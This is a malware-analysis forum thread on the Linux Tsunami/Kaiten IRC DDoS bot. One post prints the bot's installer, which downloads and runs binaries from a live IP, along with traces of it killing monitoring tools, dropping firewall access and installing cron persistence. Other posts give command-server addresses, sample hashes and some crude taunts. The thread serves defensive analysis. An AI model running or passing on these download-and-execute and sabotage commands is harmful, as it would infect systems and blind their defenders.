Linux/Tsunami

Forum for analysis and discussion about malware.

Re: (The recent) | Re: Linux/Tsunami

Postby unixfreaxjp » Sun Jan 10, 2016 6:14 pm

unixfreaxjp wrote:(maybe to couple thousands nodes tops in overall total of groups that's using it like lizard-stresser, kaitenbbot, etc)

If you think I am bullshitting count the node in this paste https://pastebin.com/655ba54R all are gayfgt and kaiten (with and without STD version)
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/Tsunami

Postby unixfreaxjp » Wed Jan 13, 2016 9:15 pm

loonysquad uses "lame way" to :lol: encode :roll: the strings in the version of Tsunami/kaiten base they called STD bot. And using encrypted communication to poke CNC (checkin)
Samples:
https://www.virustotal.com/en/file/4ef7 ... /analysis/https://www.virustotal.com/en/file/6d87 ... /analysis/
Snapshot:
pic1 pic2
tip: Read the source codes snagged from them about ktx/STD botI shared 8-)
I don't know, maybe will mention this as ELF.STD.crypted..it's tsunami base anyway, don't need to open new variant repo.
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/Tsunami

Postby unixfreaxjp » Sun Feb 07, 2016 12:52 pm

If anyone need samples directly from the source, the list is here↓

http://blog.malwaremustdie.org/2016/02/ ... ution.html
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/Tsunami

Postby unixfreaxjp » Sat Feb 13, 2016 9:44 pm

You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/Tsunami

Postby unixfreaxjp » Sun Feb 14, 2016 9:49 am

unixfreaxjp wrote:New type. Not a kaiten/tsunami/gayfgt but same actor...

Nah! I was wrong. The above case is a known kaiten STD bot, seems latest version with multiple PAN and XMAS attack.
So putting this update in this section is correct.
They built the ELF in a "new way" to avoid strings checking & stripped all symbol clean to looks "new", and that's it ;)
Well, apparently the attempt has failed. But they succeed to drop detection ratio a bit.
PoC:
Before decoding https://www.youtube.com/watch?v=81xg4LTQfI8
After decoding https://www.youtube.com/watch?v=E8gN_XUTCxM

Below is the malware infection work detail (text), shared for the shake of fighting badness in internet.
Code: Select all
# Some same-ol shitty installer

wget -c http://5.196.8.171/tty0 -P /var/run && chmod +x /var/run/tty0 && /var/run/tty0 &
wget -c http://5.196.8.171/tty1 -P /var/run && chmod +x /var/run/tty1 && /var/run/tty1 &
wget -c http://5.196.8.171/tty2 -P /var/run && chmod +x /var/run/tty2 && /var/run/tty2 &
wget -c http://5.196.8.171/tty3 -P /var/run && chmod +x /var/run/tty3 && /var/run/tty3 &
wget -c http://5.196.8.171/tty4 -P /var/run && chmod +x /var/run/tty4 && /var/run/tty4 &
wget -c http://5.196.8.171/tty5 -P /var/run && chmod +x /var/run/tty5 && /var/run/tty5 &
wget -c http://5.196.8.171/pty -P /var/run && chmod +x /var/run/pty && /var/run/pty &
rm -rf /var/run/1sh

# the ELF bins

2016/02/14  01:21 41,804 c8810d2c967ea872abceacb79d44b145 pty
2016/02/14  01:30 38,856 03db579ac3a28c5acac2253ebc24d3f2 tty0
2016/02/14  01:31 45,544 c54644d5d072122ac8d215fb69ce82d6 tty1
2016/02/14  01:32 41,112 1fc27da0273ce9245d179b9b7f30cd7f tty2
2016/02/14  01:32 49,860 a7764276a8e4a2d0aa51348926556fcb tty3
2016/02/14  01:32 45,452 8cd32ff8bb22e1c61e6eb69aaecdbe89 tty4
2016/02/14  01:32 43,308 fab538b846ac60226eba4f823345d425 tty5

# Multi architecture..lol

pty:  ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
tty0: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
tty1: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
tty2: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (GNU/Linux), statically linked, stripped
tty3: ELF 32-bit MSB executable, ARM, version 1, statically linked, stripped
tty4: ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
tty5: ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped

## Some readings...

open("/dev/null");
open("/dev/null");
access("/dev/shm/");
access("/var/tmp/");
access("/var/lock/");
access("/var/run/");
access("/tmp/");
....blah blah...

# PID set

open("/tmp/udevd0.pid", O_RDWR|O_CREAT, 0666);

# /temp preps

open("/tmp/toexec", O_RDONLY) ;

# The STUPID commands part, and PLEASE be STUPID as always :-)) hahaha!

# preventing monitoring..

execve("/bin/sh", ["sh", "-c", "killall -9 tcpdump > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 strace > /dev/null 2>&1 &"]

# setting resolve DNS to google

execve("/bin/sh", ["sh", "-c", "echo \"nameserver 8.8.8.8\" > /etc/resolv.conf &"]

# killing fields of services and other ELF malware

execve("/bin/sh", ["sh", "-c", "killall -9 telnetd > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "service httpd stop > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "service telnetd stop > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "service sshd stop > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 dropbear > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 minihttpd > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "nvram set httpd_enable=0 > /dev/null 2>&1"]
execve("/bin/sh", ["sh", "-c", "rm -rf /var/run/wgsh > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "rm -rf /var/run/bbsh > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "rm -rf /var/run/tt* > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "rm -rf /tmp/tt* > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 utelnetd > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 httpd > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 arm > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 mips > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 mipsel > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 powerpc > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 ppc > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 daemon.armv4l.mod > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 daemon.i686.mod > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 daemon.mips.mod > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 daemon.mipsel.mod > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "rm -rf /tmp/.xs/* > /dev/null 2>&1 &"]

# dropping firewall rules for SSH, TELNET HTTP and PROXY for remote access..

execve("/bin/sh", ["sh", "-c", "iptables -A INPUT -p tcp --dport 22 -j DROP > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "iptables -A INPUT -p tcp --dport 23 -j DROP > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "iptables -A INPUT -p tcp --dport 80 -j DROP > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "iptables -A INPUT -p tcp --dport 8080 -j DROP > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "chmod 700 /SAMPLE > /dev/null 2>&1 &"]

# grab the hostname

execve("/bin/uname", ["/bin/uname", "-n"]
write(1, "iSCREWskiddos\n", 8)

# installation...

execve("/bin/sh", ["sh", "-c", "(crontab -l | grep -v \"/SAMPLE\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/lock/.x001804289383) > /dev/null 2>&1"]
execve("/bin/sh", ["sh", "-c", "echo \"* * * * * /home/mong/test/cong > /dev/null 2>&1 &\" >> /var/lock/.x001804289383"]
execve("/bin/rm", ["rm", "-rf", "/var/lock/.x001804289383"]

# Boom, connecting to the IRC DDOS Botnet..

=> CONNECT: xxx.pokemoninc.com:8080
=> NICK x86|x|1|50xxxx|iSCREWskiddos
   USER x00 localhost localhost :feb012015
<= PING :FB1681F5
=> PONG :FB1681F5
<= :IRC!IRC@izu.ko PRIVMSG x86|x|1|50xxxx|iSCREWskiddos :1VERSION\1
   :izu.ko 001 x86|x|1|50xxxx|iSCREWskiddos :
   :izu.ko 002 x86|x|1|50xxxx|iSCREWskiddos :
   :izu.ko 003 x86|x|1|50xxxx|iSCREWskiddos :
   :izu.ko 004 x86|x|1|50xxxx|iSCREWskiddos :
   :izu.ko 005 x86|x|1|50xxxx|iSCREWskiddos :
   :izu.ko 005 x86|x|1|50xxxx|iSCREWskiddos :
   :izu.ko 005 x86|x|1|50xxxx|iSCREWskiddos :
   :izu.ko 375 x86|x|1|50xxxx|iSCREWskiddos :
   :izu.ko 372 x86|x|1|50xxxx|iSCREWskiddos :- 27/10/2014 11:36
   :izu.ko 372 x86|x|1|50xxxx|iSCREWskiddos :- !!
   :izu.ko 376 x86|x|1|50xxxx|iSCREWskiddos :
=> NICK x86|x|1|50xxxx|iSCREWskiddos
=> MODE x86|x|1|50xxxx|iSCREWskiddos -xi
=> JOIN #x86 :777
=> NICK x86|x|1|50xxxx|iSCREWskiddos
=> MODE x86|x|1|50xxxx|iSCREWskiddos -xi
=> JOIN #x86 :777
=> NICK x86|x|1|50xxxx|iSCREWskiddos
=> MODE x86|x|1|50xxxx|iSCREWskiddos -xi
=> JOIN #x86 :777
=> NICK x86|x|1|50xxxx|iSCREWskiddos
=> MODE x86|x|1|50xxxx|iSCREWskiddos -xi
=> JOIN #x86 :777
<= :x86|x|1|50xxxx|iSCREWskiddos!x00@1.1.1.1 JOIN :#x86

# yawn...

IPv4 TCP MMD-SCREW-LIZARD-AGAIN -> 211.103.199.98:8080 (ESTABLISHED)

# CNC:

;; QUESTION SECTION:
;xxx.pokemoninc.com.            IN      A

;; ANSWER SECTION:
xxx.pokemoninc.com.     1800    IN      A       211.103.199.98
xxx.pokemoninc.com.     1800    IN      A       203.141.196.14
xxx.pokemoninc.com.     1800    IN      A       61.156.43.106
xxx.pokemoninc.com.     1800    IN      A       202.103.224.85
xxx.pokemoninc.com.     1800    IN      A       83.143.80.227

;; AUTHORITY SECTION:
pokemoninc.com.         3600    IN      NS      dns4.name-services.com.
pokemoninc.com.         3600    IN      NS      dns1.name-services.com.
pokemoninc.com.         3600    IN      NS      dns5.name-services.com.
pokemoninc.com.         3600    IN      NS      dns2.name-services.com.
pokemoninc.com.         3600    IN      NS      dns3.name-services.com.


# MalwareMustDie! analysis by @unixfreaxjp
# Notes: Yow AntiChrist & Co. lizard looniez skeedooh!!, I screw your ELF shits "AGAIN".
# Get a REAL job kiddo! PS: Your linux skill still SUCKS..doubt anyone will hire ya.



#MalwareMustDie!
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/Tsunami

Postby orbett » Mon Mar 14, 2016 6:03 pm

UPX BadLuckJosh Linux/Tsunami, max. 5/57 on VirusTotal.

IP: 149.202.153.56

Code: Select all
9c9ff107486c1517ea450f6f40f70bda190cf1c0
ea3f9409e2346c7d0b39492c493924c07c916f09
63fe884dec6dc728069a45633ec2fa9a9f3a14f9
9f492fcf70cda93c4ed5f1c1095620596a8a61ad
d608a6b835e05ba443d33a522baff87cab45ec6a
241bef4bf1c13e942d92e5c2e714e627d2876c66
33bf638ef82c77cf31218efef9b2a58a5c360c88
c033993593de7cfe45edc862b5c86747280f938e
b1a5f9aec9a28eec00bedaf2e7ed8f0ce571f2d7
3d81efe3c32b6665fd610e4d6ae3ba604958d5f9
9e116703b9408f0ad1a48f8edd99e1592d96ac8b
5a0e334cc6d491ed36ec4f39d0935735aaafe6f6
8381989fdad449d2cbf2f993dd5e870962c0b8d9
cc4febbc9ddf33a6702e1a2800e6e596c2737a2c
757f419ad61038a8fc062f0864e99e059833ed8c
c36dda5f9c93f2cf48513bd96c7a3184b0a337d7
5eb57489e20529c0fc84261f3f8bb79607851eeb
51dc3f52fff6cebbf6ebd2616e6d4540a70200a6
4333b2c8f0cb21222c05458180cd09c60aec769e
e922e80b5d792ac682b4763c24f6112f5320ef73
8fcea554bfd57070677d5c79fddccf5a0c94d30b
26d2834ff062236a629e399aaa002fc5a56c5b84
ded044f476930247e906384b0b9a60169d61d31a
777ea97f87977499aaca6a0f19de2b399388a31f
062d8a413ba318bec73b8dde7004bf4546678d1c
orbett
 
Posts: 1
Joined: Mon Nov 10, 2014 12:55 pm
Reputation point: 0

Re: Linux/Tsunami

Postby unixfreaxjp » Fri Apr 15, 2016 7:42 pm

STD bot modification of x00's cback shell aka xxx.pokemon.inc sample
reference: http://blog.malwaremustdie.org/2016/04/ ... c-bot.html
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Previous

Return to Malware

Who is online

Users browsing this forum: No registered users and 6 guests